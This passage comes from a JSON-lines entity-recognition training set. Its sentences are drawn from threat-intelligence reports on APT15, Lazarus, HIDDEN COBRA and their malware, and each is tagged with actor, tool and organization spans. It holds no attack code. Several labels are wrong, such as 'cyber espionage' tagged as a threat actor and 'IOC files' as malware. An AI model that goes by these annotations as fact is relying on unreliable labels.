NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": {"ORGANIZATION: NCC Group 's Incident Response": [[14, 44]]}, "info": {"id": "dnrti_train_000504", "source": "dnrti_train"}} {"text": "which provides a range of services to UK Government .", "spans": {"ORGANIZATION: UK Government": [[38, 51]]}, "info": {"id": "dnrti_train_000505", "source": "dnrti_train"}} {"text": "APT15 was targeting information related to UK government departments and military technology .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]]}, "info": {"id": "dnrti_train_000506", "source": "dnrti_train"}} {"text": "backdoors that now appear to be part of APT15 's toolset .", "spans": {"THREAT_ACTOR: APT15": [[40, 45]]}, "info": {"id": "dnrti_train_000507", "source": "dnrti_train"}} {"text": "This report 
demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": {"THREAT_ACTOR: Ke3chang": [[30, 38]]}, "info": {"id": "dnrti_train_000508", "source": "dnrti_train"}} {"text": "RoyalDNS - required APT15 .", "spans": {"TOOL: RoyalDNS": [[0, 8]], "THREAT_ACTOR: APT15": [[20, 25]]}, "info": {"id": "dnrti_train_000509", "source": "dnrti_train"}} {"text": "The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": {"THREAT_ACTOR: Ke3chang group": [[4, 18]], "TOOL: keyloggers": [[29, 39]], "TOOL: .NET tool": [[54, 63]]}, "info": {"id": "dnrti_train_000510", "source": "dnrti_train"}} {"text": "APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: Mimikatz": [[30, 38]]}, "info": {"id": "dnrti_train_000511", "source": "dnrti_train"}} {"text": "This time , APT15 opted for a DNS based backdoor : RoyalDNS .", "spans": {"THREAT_ACTOR: APT15": [[12, 17]], "TOOL: DNS based backdoor": [[30, 48]], "TOOL: RoyalDNS": [[51, 59]]}, "info": {"id": "dnrti_train_000512", "source": "dnrti_train"}} {"text": "APT15 then used a tool known as RemoteExec .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: RemoteExec": [[32, 42]]}, "info": {"id": "dnrti_train_000513", "source": "dnrti_train"}} {"text": "APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "TOOL: RemoteExec": [[32, 42]], "ORGANIZATION: Microsoft": [[56, 65]]}, "info": {"id": "dnrti_train_000514", "source": "dnrti_train"}} {"text": "Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 
, known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": {"ORGANIZATION: Navy": [[51, 55]], "THREAT_ACTOR: group": [[177, 182]], "THREAT_ACTOR: APT15": [[198, 203]], "THREAT_ACTOR: cyber espionage": [[227, 242]]}, "info": {"id": "dnrti_train_000515", "source": "dnrti_train"}} {"text": "APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "THREAT_ACTOR: cyberespionage": [[30, 44]], "ORGANIZATION: government contractors": [[174, 196]]}, "info": {"id": "dnrti_train_000516", "source": "dnrti_train"}} {"text": "Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "THREAT_ACTOR: Vixen Panda": [[30, 41]], "THREAT_ACTOR: Ke3chang": [[44, 52]], "THREAT_ACTOR: Royal APT": [[55, 64]], "THREAT_ACTOR: Playful Dragon": [[71, 85]]}, "info": {"id": "dnrti_train_000517", "source": "dnrti_train"}} {"text": "ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": {"THREAT_ACTOR: group": [[19, 24]], "THREAT_ACTOR: Vixen Panda": [[29, 40]], "THREAT_ACTOR: Ke3chang": [[43, 51]], "THREAT_ACTOR: Royal APT": [[54, 63]], "THREAT_ACTOR: Playful Dragon": [[70, 84]]}, "info": {"id": "dnrti_train_000518", "source": "dnrti_train"}} {"text": "There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group .", "spans": {"THREAT_ACTOR: APT15": [[52, 57]], "ORGANIZATION: NCC Group": [[104, 113]]}, "info": {"id": "dnrti_train_000519", "source": "dnrti_train"}} {"text": "There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": 
{"THREAT_ACTOR: APT15": [[52, 57]], "ORGANIZATION: NCC Group": [[104, 113]]}, "info": {"id": "dnrti_train_000520", "source": "dnrti_train"}} {"text": "both attributed to Chinese government affiliated groups .", "spans": {}, "info": {"id": "dnrti_train_000521", "source": "dnrti_train"}} {"text": "cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": {"THREAT_ACTOR: cyber actors": [[0, 12]], "ORGANIZATION: critical infrastructure sectors": [[83, 114]]}, "info": {"id": "dnrti_train_000523", "source": "dnrti_train"}} {"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[31, 50]], "TOOL: DDoS botnets": [[59, 71]], "TOOL: keyloggers": [[74, 84]], "TOOL: remote access tools": [[87, 106]], "TOOL: RATs": [[109, 113]], "TOOL: wiper malware": [[122, 135]]}, "info": {"id": "dnrti_train_000525", "source": "dnrti_train"}} {"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[38, 57]], "TOOL: Destover": [[66, 74]], "TOOL: Hangman": [[79, 86]]}, "info": {"id": "dnrti_train_000526", "source": "dnrti_train"}} {"text": "DHS has previously released Alert TA14-353A .", "spans": {"ORGANIZATION: DHS": [[0, 3]]}, "info": {"id": "dnrti_train_000527", "source": "dnrti_train"}} {"text": "Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": {"THREAT_ACTOR: cybercriminals": [[28, 42]], "THREAT_ACTOR: Lazarus hacking group": [[178, 199]]}, "info": {"id": "dnrti_train_000529", "source": "dnrti_train"}} {"text": "The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in 
February 2016 .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "ORGANIZATION: Novetta": [[42, 49]]}, "info": {"id": "dnrti_train_000530", "source": "dnrti_train"}} {"text": "cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": {}, "info": {"id": "dnrti_train_000531", "source": "dnrti_train"}} {"text": "In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines .", "spans": {"THREAT_ACTOR: Lazarus": [[32, 39]], "TOOL: KillDisk": [[78, 86]]}, "info": {"id": "dnrti_train_000532", "source": "dnrti_train"}} {"text": "We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": {"TOOL: KillDisk malware": [[22, 38]], "THREAT_ACTOR: Lazarus": [[55, 62]], "THREAT_ACTOR: attacker": [[100, 108]]}, "info": {"id": "dnrti_train_000533", "source": "dnrti_train"}} {"text": "This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": {"THREAT_ACTOR: Lazarus": [[100, 107]]}, "info": {"id": "dnrti_train_000534", "source": "dnrti_train"}} {"text": "Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": {"TOOL: KillDisk": [[10, 18]], "THREAT_ACTOR: attackers": [[87, 96]], "THREAT_ACTOR: cyber-sabotage": [[191, 205]]}, "info": {"id": "dnrti_train_000535", "source": "dnrti_train"}} {"text": "Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", 
"spans": {"THREAT_ACTOR: attacker": [[228, 236]], "ORGANIZATION: Bangladesh Central Bank": [[277, 300]]}, "info": {"id": "dnrti_train_000536", "source": "dnrti_train"}} {"text": "Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": {"THREAT_ACTOR: Lazarus Group": [[100, 113]]}, "info": {"id": "dnrti_train_000537", "source": "dnrti_train"}} {"text": "However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": {"THREAT_ACTOR: Lazarus": [[42, 49]]}, "info": {"id": "dnrti_train_000538", "source": "dnrti_train"}} {"text": "Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Lazarus": [[35, 42]], "ORGANIZATION: customers": [[80, 89]]}, "info": {"id": "dnrti_train_000539", "source": "dnrti_train"}} {"text": "Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": {"THREAT_ACTOR: attackers": [[120, 129]], "THREAT_ACTOR: Lazarus": [[159, 166], [237, 244]]}, "info": {"id": "dnrti_train_000540", "source": "dnrti_train"}} {"text": "We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 .", "spans": {"THREAT_ACTOR: Lazarus": [[74, 81]], "THREAT_ACTOR: attacker": [[177, 185]]}, "info": {"id": "dnrti_train_000541", "source": "dnrti_train"}} {"text": "Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": 
{"THREAT_ACTOR: group": [[56, 61]]}, "info": {"id": "dnrti_train_000542", "source": "dnrti_train"}} {"text": "Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]], "ORGANIZATION: Sony Pictures Entertainment": [[105, 132]]}, "info": {"id": "dnrti_train_000543", "source": "dnrti_train"}} {"text": "We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": {"THREAT_ACTOR: Lazarus Group": [[16, 29]], "THREAT_ACTOR: group": [[151, 156]], "THREAT_ACTOR: Bluenoroff": [[180, 190]]}, "info": {"id": "dnrti_train_000544", "source": "dnrti_train"}} {"text": "Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_000545", "source": "dnrti_train"}} {"text": "To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": {"THREAT_ACTOR: Lazarus group": [[14, 27]]}, "info": {"id": "dnrti_train_000546", "source": "dnrti_train"}} {"text": "We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": {"THREAT_ACTOR: Lazarus": [[16, 23]], "ORGANIZATION: banking sector": [[70, 84]], "ORGANIZATION: trading companies": [[101, 118]], "ORGANIZATION: casinos": [[132, 139]]}, "info": {"id": "dnrti_train_000547", "source": "dnrti_train"}} {"text": "We believe Lazarus started this watering hole attack at the end of 2016 
after their other operation was interrupted in South East Asia .", "spans": {"THREAT_ACTOR: Lazarus": [[11, 18]]}, "info": {"id": "dnrti_train_000548", "source": "dnrti_train"}} {"text": "We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": {}, "info": {"id": "dnrti_train_000549", "source": "dnrti_train"}} {"text": "A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools .", "spans": {"TOOL: KiloAlfa": [[43, 51]], "THREAT_ACTOR: Lazarus Group": [[91, 104]]}, "info": {"id": "dnrti_train_000550", "source": "dnrti_train"}} {"text": "The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality .", "spans": {"TOOL: KiloAlfa": [[14, 22]], "TOOL: keylogging functionality": [[104, 128]]}, "info": {"id": "dnrti_train_000551", "source": "dnrti_train"}} {"text": "The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": {"TOOL: KiloAlfa": [[33, 41]]}, "info": {"id": "dnrti_train_000552", "source": "dnrti_train"}} {"text": "Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": {"THREAT_ACTOR: Lazarus Group": [[26, 39]], "TOOL: compromised infrastructure": [[45, 71]]}, "info": {"id": "dnrti_train_000553", "source": "dnrti_train"}} {"text": "PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server ( s ) for operations .", "spans": {"TOOL: PapaAlfa": [[0, 8]], "THREAT_ACTOR: Lazarus Group": [[72, 85]]}, "info": {"id": "dnrti_train_000554", "source": "dnrti_train"}} {"text": "Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can 
easily switch the backend destination address and port without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": {"TOOL: PapaAlfa": [[9, 17]], "THREAT_ACTOR: Lazarus": [[85, 92]], "TOOL: PapaAlfa malware": [[228, 244]]}, "info": {"id": "dnrti_train_000555", "source": "dnrti_train"}} {"text": "In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": {"TOOL: PapaAlfa": [[26, 34]], "TOOL: service DLL": [[58, 69]], "TOOL: standalone executable": [[74, 95]]}, "info": {"id": "dnrti_train_000556", "source": "dnrti_train"}} {"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": {"TOOL: IndiaBravo-PapaAlfa installer": [[4, 33]]}, "info": {"id": "dnrti_train_000557", "source": "dnrti_train"}} {"text": "While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": {"THREAT_ACTOR: Lazarus Group": [[122, 135]], "THREAT_ACTOR: espionage": [[163, 172]]}, "info": {"id": "dnrti_train_000558", "source": "dnrti_train"}} {"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures .", "spans": {}, "info": {"id": "dnrti_train_000559", "source": "dnrti_train"}} {"text": "Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": {"THREAT_ACTOR: Lazarus Group": [[41, 54]], "THREAT_ACTOR: group": [[91, 96]], "TOOL: PapaAlfa": [[133, 141]]}, "info": {"id": "dnrti_train_000560", 
"source": "dnrti_train"}} {"text": "The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": {"TOOL: wipers": [[42, 48]]}, "info": {"id": "dnrti_train_000561", "source": "dnrti_train"}} {"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": {"TOOL: DDoS malware": [[0, 12]]}, "info": {"id": "dnrti_train_000562", "source": "dnrti_train"}} {"text": "For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"MALWARE: DeltaAlfa": [[14, 23]], "TOOL: DDoS bot": [[36, 44]]}, "info": {"id": "dnrti_train_000563", "source": "dnrti_train"}} {"text": "The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": {"ORGANIZATION: Novetta": [[26, 33]], "ORGANIZATION: International Civil Aviation Organization": [[165, 206]]}, "info": {"id": "dnrti_train_000564", "source": "dnrti_train"}} {"text": "Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": {}, "info": {"id": "dnrti_train_000565", "source": "dnrti_train"}} {"text": "This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": {"TOOL: installers": [[37, 47]], "TOOL: uninstallers": [[50, 62]], "ORGANIZATION: Novetta": [[75, 82]], "THREAT_ACTOR: Lazarus Group": [[100, 113]]}, "info": {"id": "dnrti_train_000566", "source": "dnrti_train"}} {"text": "This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", 
"spans": {"TOOL: RATs": [[45, 49]], "TOOL: staging malware": [[54, 69]], "THREAT_ACTOR: Lazarus Group": [[87, 100]]}, "info": {"id": "dnrti_train_000567", "source": "dnrti_train"}} {"text": "Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": {"THREAT_ACTOR: Lazarus Group": [[83, 96], [235, 248]]}, "info": {"id": "dnrti_train_000568", "source": "dnrti_train"}} {"text": "While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": {"TOOL: installers": [[31, 41]], "TOOL: loaders": [[44, 51]], "TOOL: uninstallers": [[58, 70]], "THREAT_ACTOR: Lazarus Group": [[227, 240]]}, "info": {"id": "dnrti_train_000569", "source": "dnrti_train"}} {"text": "The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "TOOL: RATs": [[39, 43]]}, "info": {"id": "dnrti_train_000570", "source": "dnrti_train"}} {"text": "The most common communication mode for a RAT is to act as a client to a remote server .", "spans": {"TOOL: RAT": [[41, 44]]}, "info": {"id": "dnrti_train_000571", "source": "dnrti_train"}} {"text": "The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]], "TOOL: RATs": [[39, 43]], "TOOL: staging malware": [[48, 63]]}, "info": {"id": "dnrti_train_000572", "source": "dnrti_train"}} {"text": "While some members within the Romeo and Sierra groups may not implement sound 
authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": {"THREAT_ACTOR: Romeo": [[30, 35]], "THREAT_ACTOR: Sierra groups": [[40, 53]], "THREAT_ACTOR: Lazarus Group": [[270, 283]], "TOOL: RATs": [[301, 305]], "TOOL: staging malware": [[310, 325]]}, "info": {"id": "dnrti_train_000573", "source": "dnrti_train"}} {"text": "McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "THREAT_ACTOR: cybercrime group": [[127, 143]], "THREAT_ACTOR: Lazarus": [[144, 151]], "TOOL: sophisticated malware": [[162, 183]]}, "info": {"id": "dnrti_train_000576", "source": "dnrti_train"}} {"text": "McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]], "ORGANIZATION: ATR": [[34, 37]], "THREAT_ACTOR: cybercrime group": [[135, 151]], "THREAT_ACTOR: Lazarus": [[152, 159]], "TOOL: sophisticated malware": [[170, 191]]}, "info": {"id": "dnrti_train_000577", "source": "dnrti_train"}} {"text": "The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": {"TOOL: decoy documents": [[11, 26]], "THREAT_ACTOR: Lazarus group": [[77, 90]], "ORGANIZATION: aerospace organizations": [[206, 229]]}, "info": {"id": 
"dnrti_train_000579", "source": "dnrti_train"}} {"text": "The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": {}, "info": {"id": "dnrti_train_000580", "source": "dnrti_train"}} {"text": "The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": {"THREAT_ACTOR: Lazarus Group": [[4, 17]]}, "info": {"id": "dnrti_train_000581", "source": "dnrti_train"}} {"text": "In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": {"ORGANIZATION: McAfee": [[28, 34]], "THREAT_ACTOR: Lazarus group": [[87, 100]], "ORGANIZATION: financial organizations": [[109, 132]]}, "info": {"id": "dnrti_train_000582", "source": "dnrti_train"}} {"text": "This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": {}, "info": {"id": "dnrti_train_000583", "source": "dnrti_train"}} {"text": "This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[83, 114]], "ORGANIZATION: DHS": [[117, 120]], "ORGANIZATION: FBI": [[165, 168]]}, "info": {"id": "dnrti_train_000584", "source": "dnrti_train"}} {"text": "When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": {}, "info": {"id": "dnrti_train_000585", "source": "dnrti_train"}} {"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": 
[[45, 64]], "TOOL: FALLCHILL malware": [[88, 105]]}, "info": {"id": "dnrti_train_000586", "source": "dnrti_train"}} {"text": "The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": {"TOOL: RAT": [[34, 37]], "THREAT_ACTOR: actors": [[70, 76]]}, "info": {"id": "dnrti_train_000587", "source": "dnrti_train"}} {"text": "FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": {"TOOL: FALLCHILL": [[0, 9]], "TOOL: HIDDEN COBRA malware": [[64, 84]], "THREAT_ACTOR: HIDDEN COBRA actors": [[165, 184]]}, "info": {"id": "dnrti_train_000588", "source": "dnrti_train"}} {"text": "HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[0, 19]], "TOOL: external tool": [[27, 40]], "TOOL: dropper": [[44, 51]], "TOOL: FALLCHILL malware": [[67, 84]]}, "info": {"id": "dnrti_train_000589", "source": "dnrti_train"}} {"text": "HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[0, 19]], "TOOL: FALLCHILL malware": [[32, 49]]}, "info": {"id": "dnrti_train_000590", "source": "dnrti_train"}} {"text": "Working with U.S. 
government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government—commonly known as FALLCHILL .", "spans": {"ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: remote administration tool": [[160, 186]], "TOOL: RAT": [[189, 192]], "TOOL: FALLCHILL": [[249, 258]]}, "info": {"id": "dnrti_train_000591", "source": "dnrti_train"}} {"text": "This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"MALWARE: IOC files": [[14, 23]], "THREAT_ACTOR: HIDDEN COBRA": [[32, 44]], "TOOL: FALLCHILL": [[67, 76]]}, "info": {"id": "dnrti_train_000592", "source": "dnrti_train"}} {"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[0, 31]]}, "info": {"id": "dnrti_train_000593", "source": "dnrti_train"}} {"text": "Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL .", "spans": {"TOOL: HIDDEN COBRA malware": [[29, 49]], "TOOL: FALLCHILL": [[93, 102]]}, "info": {"id": "dnrti_train_000594", "source": "dnrti_train"}} {"text": "This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": {"THREAT_ACTOR: cyber group": [[142, 153]], "THREAT_ACTOR: HIDDEN COBRA": [[154, 166]]}, "info": {"id": "dnrti_train_000595", "source": "dnrti_train"}} {"text": "From March 18 to 26 we observed the malware operating in multiple areas of the world .", "spans": {}, "info": {"id": "dnrti_train_000596", "source": "dnrti_train"}} {"text": "Furthermore , the Advanced Threat Research team has 
discovered Proxysvc , which appears to be an undocumented implant .", "spans": {"ORGANIZATION: Advanced Threat Research": [[18, 42]], "TOOL: Proxysvc": [[63, 71]]}, "info": {"id": "dnrti_train_000597", "source": "dnrti_train"}} {"text": "Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": {"THREAT_ACTOR: actor": [[54, 59]], "TOOL: Bankshot": [[151, 159]]}, "info": {"id": "dnrti_train_000598", "source": "dnrti_train"}} {"text": "The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: SSL certificates": [[104, 120]], "TOOL: FakeTLS": [[129, 136]], "TOOL: Destover backdoor": [[162, 179]], "TOOL: Escad": [[197, 202]]}, "info": {"id": "dnrti_train_000599", "source": "dnrti_train"}} {"text": "Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": {"TOOL: Proxysvc": [[117, 125]], "TOOL: Destover": [[154, 162]]}, "info": {"id": "dnrti_train_000600", "source": "dnrti_train"}} {"text": "This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": {"TOOL: Destover malware": [[40, 56]]}, "info": {"id": "dnrti_train_000601", "source": "dnrti_train"}} {"text": "The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": {"THREAT_ACTOR: Lazarus": [[4, 11]], "TOOL: Destover backdoor": [[77, 94]], "TOOL: Escad": [[112, 117]]}, "info": {"id": "dnrti_train_000602", "source": "dnrti_train"}} {"text": "The McAfee Advanced 
Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[4, 35]], "MALWARE: data-gathering implant": [[73, 95]]}, "info": {"id": "dnrti_train_000603", "source": "dnrti_train"}} {"text": "The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": {"ORGANIZATION: Advanced Threat Research": [[4, 28]], "THREAT_ACTOR: actors": [[103, 109]]}, "info": {"id": "dnrti_train_000604", "source": "dnrti_train"}} {"text": "Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"THREAT_ACTOR: Lazarus": [[0, 7]]}, "info": {"id": "dnrti_train_000605", "source": "dnrti_train"}} {"text": "Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"THREAT_ACTOR: Malefactors": [[0, 11]]}, "info": {"id": "dnrti_train_000606", "source": "dnrti_train"}} {"text": "Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. 
) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain .", "spans": {"ORGANIZATION: Smart Protection Network": [[18, 42]]}, "info": {"id": "dnrti_train_000607", "source": "dnrti_train"}} {"text": "On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"ORGANIZATION: McAfee": [[21, 27]], "THREAT_ACTOR: cybercrime group": [[48, 64]], "THREAT_ACTOR: HIDDEN COBRA": [[65, 77]], "ORGANIZATION: financial organizations": [[117, 140]]}, "info": {"id": "dnrti_train_000608", "source": "dnrti_train"}} {"text": "On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[21, 52]], "THREAT_ACTOR: cybercrime group": [[78, 94]], "THREAT_ACTOR: HIDDEN COBRA": [[95, 107]], "ORGANIZATION: financial organizations": [[147, 170]]}, "info": {"id": "dnrti_train_000609", "source": "dnrti_train"}} {"text": "While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"VULNERABILITY: CVE-2015-8651": [[147, 160]], "VULNERABILITY: CVE-2016-1019": [[163, 176]], "VULNERABILITY: CVE-2016-4117": [[183, 196]]}, "info": {"id": "dnrti_train_000610", "source": "dnrti_train"}} {"text": "In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[45, 57]], "TOOL: Bankshot malware": [[61, 77]]}, "info": {"id": "dnrti_train_000611", "source": "dnrti_train"}} {"text": "In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": {"TOOL: Bankshot": 
